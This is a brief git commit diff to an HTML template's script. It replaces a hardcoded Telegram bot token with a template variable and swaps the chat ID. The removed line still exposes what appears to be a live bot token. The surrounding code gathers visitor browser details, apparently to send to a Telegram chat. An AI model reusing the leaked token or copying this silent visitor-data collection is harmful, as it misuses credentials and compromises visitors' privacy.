Add comit de chave

--- a/templates/index.html
+++ b/templates/index.html
@@ -132,9 +132,9 @@
 
 
     <script>
-        // Substitua pelos seus dados
-        const botToken = '8189469036:AAHWrWWspJ6QQmUsQmmxCgFGeq2KaJ8PQRk';
-        const chatId = '7909662522';
+        // Substitua pelos seus dados        
+        const botToken = "{{ bot_token }}";
+        const chatId = '7450047934';
 
         function getBrowserInfo() {
             return `Navegador: ${navigator.userAgent}\nPlataforma: ${navigator.platform}\nIdioma: ${navigator.language}`;
